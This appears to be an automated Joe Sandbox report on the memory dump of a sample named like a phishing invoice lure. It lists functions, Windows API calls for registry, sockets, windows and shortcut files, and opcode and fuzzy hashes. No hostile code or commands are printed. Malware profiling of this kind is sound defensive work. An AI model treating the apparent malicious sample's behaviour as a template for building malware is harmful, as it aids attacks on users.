API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 9ac833eb63b6e0dc05b55429b8b3c04c0d11acd3abbe8fd50bfb438e39095aef
Instruction ID: 02d5693dd89e56fadc5c5c715c428b7bd036dbeb72ceff6d6c288b99f9d65e89
Opcode Fuzzy Hash: 9ac833eb63b6e0dc05b55429b8b3c04c0d11acd3abbe8fd50bfb438e39095aef
Instruction Fuzzy Hash: 1511B2B2150219BEEF119F64CC86EE77F9DEF19798F108110BA18A2050C7729C61DBA4

Function 0091D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0091D7A3: _free.LIBCMT ref: 0091D7CC

_free.LIBCMT ref: 0091D82D

Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0

_free.LIBCMT ref: 0091D838
_free.LIBCMT ref: 0091D843
_free.LIBCMT ref: 0091D897
_free.LIBCMT ref: 0091D8A2
_free.LIBCMT ref: 0091D8AD
_free.LIBCMT ref: 0091D8B8

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: ab4facfb0111765fd200093cf298ee1fe1f7371c4c785adedc0ab37f9f34c76f
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 841151B1742B0CAAE521BFB0CC47FCB7BDC6F80710F440825B2A9AA0D2DAA5B5A54650

Function 0094DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0094DA74
LoadStringW.USER32(00000000), ref: 0094DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0094DA91
LoadStringW.USER32(00000000), ref: 0094DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0094DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0094DAB9

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 2dfdd13105642c6ab940b2c679991d2dc8a4448d30d91366b726b05ab2dc033d
Instruction ID: c536526b27fdda80524e64e7d168f72ad4419362845e3e0eb669d888de55c4f9
Opcode Fuzzy Hash: 2dfdd13105642c6ab940b2c679991d2dc8a4448d30d91366b726b05ab2dc033d
Instruction Fuzzy Hash: A70186F75142087FE711ABA09D89EEB376CE708705F4048A9B74AE2041EA749EC44F74

Function 0095096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(019A0CB0,019A0CB0), ref: 0095097B
EnterCriticalSection.KERNEL32(019A0C90,00000000), ref: 0095098D
TerminateThread.KERNEL32(006F0074,000001F6), ref: 0095099B
WaitForSingleObject.KERNEL32(006F0074,000003E8), ref: 009509A9
CloseHandle.KERNEL32(006F0074), ref: 009509B8
InterlockedExchange.KERNEL32(019A0CB0,000001F6), ref: 009509C8
LeaveCriticalSection.KERNEL32(019A0C90), ref: 009509CF

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: af03f5f9ae3eb02609cb377bd125aeb69a1baa3a9915cbe70de8f771b97dd08f
Instruction ID: 457a86b412d4248907f54e1a0d6081fe34ecf15e42338ca1c14c8f169d320dbd
Opcode Fuzzy Hash: af03f5f9ae3eb02609cb377bd125aeb69a1baa3a9915cbe70de8f771b97dd08f
Instruction Fuzzy Hash: BFF03C7345AA02FBD7415FA4EE8CBD6BB39FF41702F402029F206A08A5CB7494A5DF90

Function 008E5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 008E5D30
GetWindowRect.USER32(?,?), ref: 008E5D71
ScreenToClient.USER32(?,?), ref: 008E5D99
GetClientRect.USER32(?,?), ref: 008E5ED7
GetWindowRect.USER32(?,?), ref: 008E5EF8

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 26ee2146a9a4553fe30a1eadb9ad83756bd8b1e0735f318e5b137b436b583d31
Instruction ID: 87cb0efa76381a6e25c202ae2bc368f161c0389fdae34a9de208ed244c22318b
Opcode Fuzzy Hash: 26ee2146a9a4553fe30a1eadb9ad83756bd8b1e0735f318e5b137b436b583d31
Instruction Fuzzy Hash: 51B18A79A1078ADBDB10CFA9C4807EEB7F1FF48314F14841AE8A9D7254DB30AA51DB50

Function 009101B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 009100BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009100D6
__allrem.LIBCMT ref: 009100ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0091010B
__allrem.LIBCMT ref: 00910122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00910140

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
Instruction ID: 7c64150170cccd4ed4189de3fe5c62580a5aa068b7a78526f9a2fdffcef3e5bf
Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
Instruction Fuzzy Hash: 57811772B0070AAFE7209E28CC51BAB73E9EFC5360F24453AF551D66C1E7B5DA808750

Function 00961D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00963149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0096101C,00000000,?,?,00000000), ref: 00963195

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00961DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00961DE1
WSAGetLastError.WSOCK32 ref: 00961DF2
inet_ntoa.WSOCK32(?), ref: 00961E8C
htons.WSOCK32(?,?,?,?,?), ref: 00961EDB
_strlen.LIBCMT ref: 00961F35

Part of subcall function 009439E8: _strlen.LIBCMT ref: 009439F2

Part of subcall function 008E6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,008FCF58,?,?,?), ref: 008E6DBA
Part of subcall function 008E6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,008FCF58,?,?,?), ref: 008E6DED

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
String ID:
API String ID: 1923757996-0
Opcode ID: 87e0394d8f0534dcce910c662bc6bdb241eab6dfa8a26a8e27b42d25a8a4cc12
Instruction ID: 1345c9e1f11e3d1d2567840eac34472984cf60414d3d9d5f9c32a995597fa259
Opcode Fuzzy Hash: 87e0394d8f0534dcce910c662bc6bdb241eab6dfa8a26a8e27b42d25a8a4cc12
Instruction Fuzzy Hash: CAA1DE31604340AFC324DB24C891F2A7BA9FF85318F58895CF5569B2A2DB71ED46CB92

Function 009161FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009082D9,009082D9,?,?,?,0091644F,00000001,00000001,8BE85006), ref: 00916258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0091644F,00000001,00000001,8BE85006,?,?,?), ref: 009162DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009163D8
__freea.LIBCMT ref: 009163E5

Part of subcall function 00913820: RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852

__freea.LIBCMT ref: 009163EE
__freea.LIBCMT ref: 00916413

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 21b2fe8a54bdfe79b421b38279008c98e063344080a9064e24f89fb486ea9de8
Instruction ID: d59937cd8795820d17efb63a7bd95e011a757d72e88c5ab40d8c6abb95f21a8b
Opcode Fuzzy Hash: 21b2fe8a54bdfe79b421b38279008c98e063344080a9064e24f89fb486ea9de8
Instruction Fuzzy Hash: CC51D072B0021AABDB258F64CD81FEF77AAEB84710F144629FC25D6180EB34DCC1D660

Function 0096BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

Part of subcall function 0096C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096B6AE,?,?), ref: 0096C9B5
Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096C9F1
Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA68
Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096BD25
RegCloseKey.ADVAPI32(00000000), ref: 0096BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0096BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0096BDF3
RegCloseKey.ADVAPI32(?), ref: 0096BDFF

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: fdbbfffd3a40994cb68253af38ba43ee0e7663b2e0ec826d4ba7e331e712582b
Instruction ID: eb385b119c77282dc5fd08a1f3564f189b4dbd7737631328b1810175ab06d253
Opcode Fuzzy Hash: fdbbfffd3a40994cb68253af38ba43ee0e7663b2e0ec826d4ba7e331e712582b
Instruction Fuzzy Hash: 2C81C571108241EFC714DF24C895E2ABBE9FF85308F14895CF5998B2A2DB31ED85CB92

Function 0093F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0093F7B9
SysAllocString.OLEAUT32(00000001), ref: 0093F860
VariantCopy.OLEAUT32(0093FA64,00000000), ref: 0093F889
VariantClear.OLEAUT32(0093FA64), ref: 0093F8AD
VariantCopy.OLEAUT32(0093FA64,00000000), ref: 0093F8B1
VariantClear.OLEAUT32(?), ref: 0093F8BB

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: ec60b6dcb43f48bb9746c19983233b4c8e20d0f512508c418b60082f83dc0695
Instruction ID: f77f793b7949d5ce79ea7c1bed083cf8a6ef8e93697ccec1d2727dea721222a3
Opcode Fuzzy Hash: ec60b6dcb43f48bb9746c19983233b4c8e20d0f512508c418b60082f83dc0695
Instruction Fuzzy Hash: D551B735D10314BBCF24AB65D8A5B29B3A9EF45310F245866F906DF292DB748C40CF57

Function 0095910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 008E7620: _wcslen.LIBCMT ref: 008E7625

Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 009594E5
_wcslen.LIBCMT ref: 00959506
_wcslen.LIBCMT ref: 0095952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00959585

Strings

X, xrefs: 00959412

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: aec2f674666269b53cec18f277c42030baa66cbda86fc23fd65f44354c6d44e5
Instruction ID: d0da13c3cef5ed4a145fd7bb3d36c8534339a0a56cf8258cc69c17d3f6bc3def
Opcode Fuzzy Hash: aec2f674666269b53cec18f277c42030baa66cbda86fc23fd65f44354c6d44e5
Instruction Fuzzy Hash: E9E1B431508340DFD724DF2AC881A6AB7E4FF85314F14896DF9999B2A2EB31DD05CB92

Function 008F920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2

BeginPaint.USER32(?,?,?), ref: 008F9241
GetWindowRect.USER32(?,?), ref: 008F92A5
ScreenToClient.USER32(?,?), ref: 008F92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008F92D3
EndPaint.USER32(?,?,?,?,?), ref: 008F9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009371EA

Part of subcall function 008F9339: BeginPath.GDI32(00000000), ref: 008F9357

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: aae24785eb7ec7d236c79107292aa075392c7cd75f6a188475ccc6ad2ea448b8
Instruction ID: e0541d7262a516236dae80a99eeddea3a21cd3b256dc53b04c8cb829e7b05b4e
Opcode Fuzzy Hash: aae24785eb7ec7d236c79107292aa075392c7cd75f6a188475ccc6ad2ea448b8
Instruction Fuzzy Hash: 1941B071118305AFD721DF64DCD4FBA7BA8FB55324F140229FAA8C72A1C7319885EB62

Function 009507EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0095080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00950847
EnterCriticalSection.KERNEL32(?), ref: 00950863
LeaveCriticalSection.KERNEL32(?), ref: 009508DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 009508F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00950921

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 30be7dcd5d2f6aa85e116d938f3f5a4626960da3c9e466a32f1b9298f7ce152e
Instruction ID: b28a9064e09458fa08cdd7fc83f6d573c741a82804dd8ffa3743faa6134aaa4c
Opcode Fuzzy Hash: 30be7dcd5d2f6aa85e116d938f3f5a4626960da3c9e466a32f1b9298f7ce152e
Instruction Fuzzy Hash: 01414871900209EBDF14EF65DC85A6A77B8FF44310F1440A9EE04AE29BDB31DE65DBA0

Function 009781DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0093F3AB,00000000,?,?,00000000,?,0093682C,00000004,00000000,00000000), ref: 0097824C
EnableWindow.USER32(00000000,00000000), ref: 00978272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 009782D1
ShowWindow.USER32(00000000,00000004), ref: 009782E5
EnableWindow.USER32(00000000,00000001), ref: 0097830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0097832F

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: e3607093832fe2dc7539007505427b2fd72e4e58ab710845fc654c102434a560
Instruction ID: 7daa732f0f0306f6e8048fc7f18a2287592316d0a2f2f82f67b03b8ba4a68454
Opcode Fuzzy Hash: e3607093832fe2dc7539007505427b2fd72e4e58ab710845fc654c102434a560
Instruction Fuzzy Hash: 0741F332645640EFDB25CF14D99DBE57BE4FB4A755F1882A8E61C4B2A3CB31A841CB40

Function 00944C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00944C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00944CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00944CEA
_wcslen.LIBCMT ref: 00944D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00944D10
_wcsstr.LIBVCRUNTIME ref: 00944D1A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 2dab0ec79f85d9052673667429e741404a8a11ab2774125aa57657154ffdccaa
Instruction ID: 8e6743aa966f1dbb0846aace8106a7fbc22d5946fc88eed80f997b54b254e7ce
Opcode Fuzzy Hash: 2dab0ec79f85d9052673667429e741404a8a11ab2774125aa57657154ffdccaa
Instruction Fuzzy Hash: F5213872604205BBEB255B39EC89F7B7B9CDF45750F10803DF909CE1D2EA61DC4096A0

Function 0095581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 008E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E3A97,?,?,008E2E7F,?,?,?,00000000), ref: 008E3AC2

_wcslen.LIBCMT ref: 0095587B
CoInitialize.OLE32(00000000), ref: 00955995
CoCreateInstance.OLE32(0097FCF8,00000000,00000001,0097FB68,?), ref: 009559AE
CoUninitialize.OLE32 ref: 009559CC

Strings

.lnk, xrefs: 00955876, 009558C1, 00955985

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 28dbd566c5afe838d2931b901cdff4859f2ce895f7dea536146e35de4d1931de
